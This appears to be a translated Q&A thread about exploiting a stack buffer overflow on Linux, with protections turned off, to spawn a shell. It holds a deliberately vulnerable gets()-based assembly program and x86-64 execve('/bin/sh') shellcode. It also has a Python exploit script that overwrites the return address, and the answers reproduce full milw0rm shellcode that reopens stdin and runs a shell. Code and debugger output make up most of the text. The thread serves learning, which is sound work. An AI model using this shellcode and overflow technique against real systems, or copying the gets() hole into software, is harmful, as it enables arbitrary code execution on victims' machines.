Shellcode для простого переполнения стека: эксплуатируемая программа с оболочкой завершается сразу после execve ("/ bin / sh") - PullRequest
Новая
       8

Shellcode для простого переполнения стека: эксплуатируемая программа с оболочкой завершается сразу после execve ("/ bin / sh")

16 голосов
/ 18 мая 2010

Я играл с переполнением буфера в Linux (amd64) и пытался использовать простую программу, но она не удалась. Я отключил функции безопасности (рандомизация размещения адресного пространства с помощью sysctl -w kernel.randomize_va_space = 0 и nx bit в BIOS). Он переходит в стек и выполняет шелл-код, но не запускает оболочку. Execve системный вызов успешно, но после этого он просто завершается. Есть идеи, что случилось? Запуск автономного шеллкода работает просто отлично.

Бонусный вопрос: зачем мне устанавливать rax на ноль перед вызовом printf? (См. Комментарий в коде)

Уязвимый файл buffer.s : 

.data
.fmtsp:
.string "Stackpointer %p\n"
.fmtjump:
.string "Jump to %p\n"
.text
.global main
main:
    push %rbp
    mov %rsp, %rbp

    sub $120,  %rsp

    # calling printf without setting rax
    # to zero results in a segfault. why?
    xor %rax, %rax 
    mov %rsp, %rsi
    mov $.fmtsp, %rdi
    call printf

    mov %rsp, %rdi
    call gets

    xor %rax, %rax
    mov $.fmtjump, %rdi
    mov 8(%rbp), %rsi
    call printf

    xor %rax, %rax
    leave
    ret

shellcode.s 

.text
.global main
main:
    mov $0x68732f6e69622fff, %rbx
    shr $0x8, %rbx
    push %rbx
    mov %rsp, %rdi
    xor %rsi, %rsi
    xor %rdx, %rdx
    xor %rax, %rax
    add $0x3b, %rax
    syscall

exploit.py 

shellcode = "\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x48\x83\xc0\x3b\x0f\x05"
stackpointer = "\x7f\xff\xff\xff\xe3\x28"
output = shellcode
output += 'a' * (120 - len(shellcode)) # fill buffer
output += 'b' * 8 # override stored base pointer
output += ''.join(reversed(stackpointer))
print output

Скомпилировано с: 

$ gcc -o buffer buffer.s
$ gcc -o shellcode shellcode.s

Начато с: 

$ python exploit.py | ./buffer
Stackpointer 0x7fffffffe328
Jump to 0x7fffffffe328

Отладка с помощью gdb: 

$ python exploit.py > exploit.txt (Note: corrected stackpointer address in exploit.py for gdb)
$ gdb buffer
(gdb) run < exploit.txt
Starting program: /home/henning/bo/buffer < exploit.txt
Stackpointer 0x7fffffffe308
Jump to 0x7fffffffe308
process 4185 is executing new program: /bin/dash

Program exited normally.

Ответы [ 2 ]

12 голосов
/ 20 мая 2010

У меня сейчас почти такая же проблема с Ubuntu 9.10 в виртуальной машине. Отключены все измерения безопасности ОС, и простые эксплойты, такие как «выйти из программы и установить код выхода на 42», работают, но при попытке открыть оболочку программа просто завершается. Вывод GDB идентичен: 

(gdb) run < exploit.0xbffff3b8 
Starting program: /home/seminar/ubung/target/client < exploit.0xbffff3b8

Enter password: Sorry. Wrong password.
Executing new program: /bin/bash

Program exited normally.
(gdb)

Дело в том, что мне нужно, чтобы он работал прибл. 16 часов для презентации: -D

Обновление: Я нашел это аккуратное исследование: www.shell-storm.org/papers/files/539.pdf

На странице 16 написано: «Если мы попытаемся выполнить оболочку, она немедленно прекратит работу в этой конфигурации»

В других примерах, которые не используют get (), они очень хорошо порождают оболочку. К сожалению, они не дают намека на то, ПОЧЕМУ это не работает таким образом. (

Следующее обновление: Кажется, это связано со стандартным вводом данных. Оболочка не может правильно использовать ту, которую она получает от исходного процесса. Я попытался использовать минимальную оболочку, для которой я нашел исходный код (evilsh). Он упал в точке, где он пытался прочитать ввод. Я предполагаю, что bash / dash проверяет это и просто молча завершает работу, когда что-то не так с stdin.

Хорошо, пожалуйста, не убивайте меня за этот разговор с самим собой, но ...

Я нашел решение!

По какой-то причине необходимо повторно открыть входы. Я нашел рабочий шелл-код здесь:

http://www.milw0rm.com/shellcode/2040

Я не вижу жестких подсказок, но я могу запускать программы и т. Д. С помощью открывающейся оболочки.

3 голосов
/ 30 марта 2017

Ссылка, предоставленная Zenoc, мертва, но все еще может быть найдена в машине Wayback. Для удобства я воспроизвел это ниже. Я должен был включить add $0x10,%esp сверху, чтобы дать мне больше места в стеке, так как все push в коде ушли в буфер, где хранился мой шелл-код. Если вы тоже хотите включить это в шелл-код, просто добавьте «\ x83 \ xc4 \ x10» в начало. Шелл-код составляет 55 байт без моего добавления и 58 с. 

/*
 * $Id: gets-linux.c,v 1.3 2004/06/02 12:22:30 raptor Exp $
 *
 * gets-linux.c - stdin re-open shellcode for Linux/x86
 * Copyright (c) 2003 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * Local shellcode for stdin re-open and /bin/sh exec. It closes stdin 
 * descriptor and re-opens /dev/tty, then does an execve() of /bin/sh.
 * Useful to exploit some gets() buffer overflows in an elegant way...
 */

/*
 * close(0) 
 *
 * 8049380:       31 c0                   xor    %eax,%eax
 * 8049382:       31 db                   xor    %ebx,%ebx
 * 8049384:       b0 06                   mov    $0x6,%al
 * 8049386:       cd 80                   int    $0x80
 *
 * open("/dev/tty", O_RDWR | ...)
 *
 * 8049388:       53                      push   %ebx
 * 8049389:       68 2f 74 74 79          push   $0x7974742f
 * 804938e:       68 2f 64 65 76          push   $0x7665642f
 * 8049393:       89 e3                   mov    %esp,%ebx
 * 8049395:       31 c9                   xor    %ecx,%ecx
 * 8049397:       66 b9 12 27             mov    $0x2712,%cx
 * 804939b:       b0 05                   mov    $0x5,%al
 * 804939d:       cd 80                   int    $0x80
 *
 * execve("/bin/sh", ["/bin/sh"], NULL)
 *
 * 804939f:       31 c0                   xor    %eax,%eax
 * 80493a1:       50                      push   %eax
 * 80493a2:       68 2f 2f 73 68          push   $0x68732f2f
 * 80493a7:       68 2f 62 69 6e          push   $0x6e69622f
 * 80493ac:       89 e3                   mov    %esp,%ebx
 * 80493ae:       50                      push   %eax
 * 80493af:       53                      push   %ebx
 * 80493b0:       89 e1                   mov    %esp,%ecx
 * 80493b2:       99                      cltd   
 * 80493b3:       b0 0b                   mov    $0xb,%al
 * 80493b5:       cd 80                   int    $0x80
 */

char sc[] = 
"\x31\xc0\x31\xdb\xb0\x06\xcd\x80"
"\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80"
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

main()
{
    int (*f)() = (int (*)())sc; f();
}

// milw0rm.com [2006-07-20]

Примечание: я не мог добавить это как редактирование к ответу Zenoc, потому что очередь редактирования заполнена.

Если у вас возникли проблемы с точным указанием адреса вашего шелл-кода из-за различий стеков в терминале и gdb, взгляните на мой ответ здесь .

...